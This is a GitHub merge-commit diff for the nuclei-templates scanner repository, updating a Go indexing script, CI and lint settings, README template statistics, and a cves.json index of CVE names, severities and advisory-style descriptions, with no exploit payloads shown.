Merge branch 'main' into dashboard

patch-1
Ritik Chaddha 2023-02-07 02:04:58 +05:30 committed by GitHub
commit fee8ede5fa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
97 changed files with 14622 additions and 2527 deletions

View File

@ -59,7 +59,8 @@ func main() {
if d.Info.Classification == (Classification{}) {
d.Info.Classification.CVSSScore = "N/A"
}
d.FilePath = path
fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)
d.FilePath = fpath
data = append(data, d)
}

View File

@ -35,4 +35,4 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master
branch: main

View File

@ -1,30 +1,21 @@
cves/2017/CVE-2017-1000163.yaml
cves/2022/CVE-2022-1168.yaml
cves/2022/CVE-2022-32429.yaml
cves/2022/CVE-2022-39195.yaml
exposed-panels/completeview-web-panel.yaml
exposed-panels/connect-box-login.yaml
exposed-panels/esphome-panel.yaml
exposed-panels/fortinet/fortios-management-panel.yaml
exposed-panels/mystrom-panel.yaml
exposed-panels/pulsar-admin-console.yaml
exposed-panels/pulsar-adminui-panel.yaml
exposed-panels/pulsar360-admin-panel.yaml
exposed-panels/saltstack-config-panel.yaml
exposed-panels/sqlbuddy-panel.yaml
exposures/configs/cypress-web-config.yaml
file/android/deep-link-detect.yaml
headless/headless-open-redirect.yaml
miscellaneous/exposed-file-upload-form.yaml
misconfiguration/esphome-dashboard.yaml
misconfiguration/installer/nagiosxi-installer.yaml
misconfiguration/rethinkdb-admin-console.yaml
misconfiguration/sound4-directory-listing.yaml
misconfiguration/syncthing-dashboard.yaml
misconfiguration/webalizer-statistics.yaml
technologies/default-lighttpd-placeholder-page.yaml
vulnerabilities/other/academy-lms-xss.yaml
vulnerabilities/other/slims-xss.yaml
vulnerabilities/other/sound4-file-disclosure.yaml
vulnerabilities/other/tikiwiki-xss.yaml
vulnerabilities/vmware/vmware-cloud-xss.yaml
cves/2022/CVE-2022-47986.yaml
dns/dmarc-detect.yaml
exposed-panels/caton-network-manager-system.yaml
exposed-panels/ewm-manager-panel.yaml
exposed-panels/exagrid-manager-panel.yaml
exposed-panels/powercom-network-manager.yaml
exposed-panels/redis-enterprise-panel.yaml
exposed-panels/sevone-nms-network-manager.yaml
exposures/configs/accueil-wampserver.yaml
iot/loytec-device.yaml
iot/ulanzi-clock.yaml
misconfiguration/php-src-disclosure.yaml
misconfiguration/setup-github-enterprise.yaml
misconfiguration/transmission-dashboard.yaml
misconfiguration/unauth-axyom-network-manager.yaml
network/enumeration/mongodb-info-enum.yaml
technologies/connectwise-control-detect.yaml
technologies/openhap-detect.yaml
technologies/zope-detect.yaml
vulnerabilities/avaya/avaya-aura-rce.yaml
vulnerabilities/avaya/avaya-aura-xss.yaml

View File

@ -3,7 +3,9 @@ extends: default
ignore: |
.pre-commit-config.yml
.github/workflows/*.yml
.github/
.git/
*.yml
rules:
document-start: disable
@ -15,3 +17,5 @@ rules:
require-starting-space: true
ignore-shebangs: true
min-spaces-from-content: 1
empty-lines:
max: 5

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
| cve | 1593 | dhiyaneshdk | 713 | cves | 1572 | info | 2006 | http | 4718 |
| panel | 826 | daffainfo | 662 | exposed-panels | 827 | high | 1161 | network | 84 |
| wordpress | 688 | pikpikcu | 344 | technologies | 544 | medium | 886 | file | 80 |
| exposure | 591 | pdteam | 273 | vulnerabilities | 532 | critical | 579 | dns | 17 |
| edb | 586 | geeknik | 221 | misconfiguration | 390 | low | 261 | | |
| wp-plugin | 583 | ricardomaia | 212 | exposures | 329 | unknown | 23 | | |
| tech | 581 | pussycat0x | 191 | token-spray | 239 | | | | |
| xss | 561 | ritikchaddha | 182 | workflows | 190 | | | | |
| lfi | 524 | 0x_akoko | 174 | default-logins | 123 | | | | |
| cve2021 | 375 | dwisiswant0 | 171 | file | 80 | | | | |
**337 directories, 5307 files**.
**337 directories, 5338 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
| cve | 1593 | dhiyaneshdk | 713 | cves | 1572 | info | 2006 | http | 4718 |
| panel | 826 | daffainfo | 662 | exposed-panels | 827 | high | 1161 | network | 84 |
| wordpress | 688 | pikpikcu | 344 | technologies | 544 | medium | 886 | file | 80 |
| exposure | 591 | pdteam | 273 | vulnerabilities | 532 | critical | 579 | dns | 17 |
| edb | 586 | geeknik | 221 | misconfiguration | 390 | low | 261 | | |
| wp-plugin | 583 | ricardomaia | 212 | exposures | 329 | unknown | 23 | | |
| tech | 581 | pussycat0x | 191 | token-spray | 239 | | | | |
| xss | 561 | ritikchaddha | 182 | workflows | 190 | | | | |
| lfi | 524 | 0x_akoko | 174 | default-logins | 123 | | | | |
| cve2021 | 375 | dwisiswant0 | 171 | file | 80 | | | | |

100
cves.json
View File

@ -69,6 +69,7 @@
{"ID":"CVE-2010-1352","Info":{"Name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1352.yaml"}
{"ID":"CVE-2010-1353","Info":{"Name":"Joomla! Component LoginBox - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1353.yaml"}
{"ID":"CVE-2010-1354","Info":{"Name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1354.yaml"}
{"ID":"CVE-2010-1429","Info":{"Name":"JBossEAP - Sensitive Information Disclosure","Severity":"low","Description":"Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about \"deployed web contexts\" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1429.yaml"}
{"ID":"CVE-2010-1461","Info":{"Name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1461.yaml"}
{"ID":"CVE-2010-1469","Info":{"Name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1469.yaml"}
{"ID":"CVE-2010-1470","Info":{"Name":"Joomla! Component Web TV 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-1470.yaml"}
@ -332,7 +333,7 @@
{"ID":"CVE-2016-4977","Info":{"Name":"Spring Security OAuth2 Remote Command Execution","Severity":"high","Description":"Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2016/CVE-2016-4977.yaml"}
{"ID":"CVE-2016-5649","Info":{"Name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","Severity":"critical","Description":"NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2016/CVE-2016-5649.yaml"}
{"ID":"CVE-2016-6277","Info":{"Name":"NETGEAR Routers - Remote Code Execution","Severity":"high","Description":"NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2016/CVE-2016-6277.yaml"}
{"ID":"CVE-2016-6601","Info":{"Name":"ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal","Severity":"high","Description":"Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2016/CVE-2016-6601.yaml"}
{"ID":"CVE-2016-6601","Info":{"Name":"ZOHO WebNMS Framework \u003c5.2 SP1 - Local File Inclusion","Severity":"high","Description":"ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2016/CVE-2016-6601.yaml"}
{"ID":"CVE-2016-7552","Info":{"Name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","Severity":"critical","Description":"Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2016/CVE-2016-7552.yaml"}
{"ID":"CVE-2016-7834","Info":{"Name":"Sony IPELA Engine IP Camera - Hardcoded Account","Severity":"high","Description":"Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2016/CVE-2016-7834.yaml"}
{"ID":"CVE-2016-7981","Info":{"Name":"SPIP \u003c3.1.2 - Cross-Site Scripting","Severity":"medium","Description":"SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2016/CVE-2016-7981.yaml"}
@ -340,11 +341,13 @@
{"ID":"CVE-2017-0929","Info":{"Name":"DotNetNuke (DNN) ImageHandler \u003c9.2.0 - Server-Side Request Forgery","Severity":"high","Description":"DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-0929.yaml"}
{"ID":"CVE-2017-1000028","Info":{"Name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-1000028.yaml"}
{"ID":"CVE-2017-1000029","Info":{"Name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-1000029.yaml"}
{"ID":"CVE-2017-1000163","Info":{"Name":"The Phoenix Framework versions 1.0.0 - Open redirect","Severity":"medium","Description":"The Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 are vulnerable to unvalidated URL redirection, which may result in phishing or social engineering attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-1000163.yaml"}
{"ID":"CVE-2017-1000170","Info":{"Name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","Severity":"high","Description":"WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-1000170.yaml"}
{"ID":"CVE-2017-1000486","Info":{"Name":"Primetek Primefaces 5.x - Remote Code Execution","Severity":"critical","Description":"Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-1000486.yaml"}
{"ID":"CVE-2017-10075","Info":{"Name":"Oracle Content Server - Cross-Site Scripting","Severity":"high","Description":"Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2017/CVE-2017-10075.yaml"}
{"ID":"CVE-2017-10271","Info":{"Name":"Oracle WebLogic Server - Remote Command Execution","Severity":"high","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-10271.yaml"}
{"ID":"CVE-2017-10974","Info":{"Name":"Yaws 1.91 - Local File Inclusion","Severity":"high","Description":"Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-10974.yaml"}
{"ID":"CVE-2017-11165","Info":{"Name":"DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure","Severity":"critical","Description":"dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-11165.yaml"}
{"ID":"CVE-2017-11444","Info":{"Name":"Subrion CMS \u003c4.1.5.10 - SQL Injection","Severity":"critical","Description":"Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-11444.yaml"}
{"ID":"CVE-2017-11512","Info":{"Name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","Severity":"high","Description":"ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-11512.yaml"}
{"ID":"CVE-2017-11586","Info":{"Name":"FineCMS \u003c5.0.9 - Open Redirect","Severity":"medium","Description":"FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-11586.yaml"}
@ -362,7 +365,7 @@
{"ID":"CVE-2017-12637","Info":{"Name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","Severity":"high","Description":"SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-12637.yaml"}
{"ID":"CVE-2017-12794","Info":{"Name":"Django Debug Page - Cross-Site Scripting","Severity":"medium","Description":"Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with \"DEBUG = True\" is not on by default (which is what makes the page visible).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-12794.yaml"}
{"ID":"CVE-2017-14135","Info":{"Name":"OpenDreambox 2.0.0 - Remote Code Execution","Severity":"critical","Description":"OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-14135.yaml"}
{"ID":"CVE-2017-14186","Info":{"Name":"FortiGate SSL VPN Web Portal - Cross Site Scripting","Severity":"medium","Description":"Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2017/CVE-2017-14186.yaml"}
{"ID":"CVE-2017-14186","Info":{"Name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","Severity":"medium","Description":"FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2017/CVE-2017-14186.yaml"}
{"ID":"CVE-2017-14535","Info":{"Name":"Trixbox - 2.8.0.4 OS Command Injection","Severity":"high","Description":"Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-14535.yaml"}
{"ID":"CVE-2017-14537","Info":{"Name":"Trixbox 2.8.0 - Path Traversal","Severity":"medium","Description":"Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2017/CVE-2017-14537.yaml"}
{"ID":"CVE-2017-14651","Info":{"Name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2017/CVE-2017-14651.yaml"}
@ -390,7 +393,7 @@
{"ID":"CVE-2017-5487","Info":{"Name":"WordPress Core \u003c 4.7.1 - Username Enumeration","Severity":"medium","Description":"WordPress Core \u003c 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2017/CVE-2017-5487.yaml"}
{"ID":"CVE-2017-5521","Info":{"Name":"NETGEAR Routers - Authentication Bypass","Severity":"high","Description":"NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2017/CVE-2017-5521.yaml"}
{"ID":"CVE-2017-5631","Info":{"Name":"KMCIS CaseAware - Cross-Site Scripting","Severity":"medium","Description":"KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-5631.yaml"}
{"ID":"CVE-2017-5638","Info":{"Name":"Apache Struts 2 - Remote Command Execution","Severity":"critical","Description":"Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2017/CVE-2017-5638.yaml"}
{"ID":"CVE-2017-5638","Info":{"Name":"Apache Struts 2 - Remote Command Execution","Severity":"critical","Description":"Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.\n","Classification":{"CVSSScore":"10"}},"file_path":"cves/2017/CVE-2017-5638.yaml"}
{"ID":"CVE-2017-5689","Info":{"Name":"Intel Active Management Technology - Authentication Bypass","Severity":"critical","Description":"An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-5689.yaml"}
{"ID":"CVE-2017-5982","Info":{"Name":"Kodi 17.1 - Local File Inclusion","Severity":"high","Description":"Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-5982.yaml"}
{"ID":"CVE-2017-6090","Info":{"Name":"PhpColl 2.5.1 Arbitrary File Upload","Severity":"high","Description":"PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-6090.yaml"}
@ -427,8 +430,10 @@
{"ID":"CVE-2018-10822","Info":{"Name":"D-Link Routers - Local File Inclusion","Severity":"high","Description":"D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-10822.yaml"}
{"ID":"CVE-2018-10823","Info":{"Name":"D-Link Routers - Remote Command Injection","Severity":"high","Description":"D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2018/CVE-2018-10823.yaml"}
{"ID":"CVE-2018-10956","Info":{"Name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","Severity":"high","Description":"IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-10956.yaml"}
{"ID":"CVE-2018-11227","Info":{"Name":"Monstra CMS V3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Monstra CMS 3.0.4 and earlier has XSS via index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-11227.yaml"}
{"ID":"CVE-2018-11231","Info":{"Name":"Opencart Divido - Sql Injection","Severity":"high","Description":"OpenCart Divido plugin is susceptible to SQL injection\n","Classification":{"CVSSScore":"8.10"}},"file_path":"cves/2018/CVE-2018-11231.yaml"}
{"ID":"CVE-2018-11409","Info":{"Name":"Splunk Sensitive Information Disclosure","Severity":"medium","Description":"Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2018/CVE-2018-11409.yaml"}
{"ID":"CVE-2018-11473","Info":{"Name":"Monstra CMS V3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Monstra CMS 3.0.4 has XSS in the registration Form (i.e., the login parameter to users/registration).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-11473.yaml"}
{"ID":"CVE-2018-11709","Info":{"Name":"WordPress wpForo Forum \u003c= 1.4.11 - Cross-Site Scripting","Severity":"medium","Description":"WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-11709.yaml"}
{"ID":"CVE-2018-11759","Info":{"Name":"Apache Tomcat JK Connect \u003c=1.2.44 - Manager Access","Severity":"high","Description":"Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2018/CVE-2018-11759.yaml"}
{"ID":"CVE-2018-11776","Info":{"Name":"Apache Struts2 S2-057 - Remote Code Execution","Severity":"high","Description":"Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2018/CVE-2018-11776.yaml"}
@ -478,6 +483,7 @@
{"ID":"CVE-2018-16761","Info":{"Name":"Eventum \u003c3.4.0 - Open Redirect","Severity":"medium","Description":"Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2018/CVE-2018-16761.yaml"}
{"ID":"CVE-2018-16763","Info":{"Name":"FUEL CMS 1.4.1 - Remote Code Execution","Severity":"critical","Description":"FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-16763.yaml"}
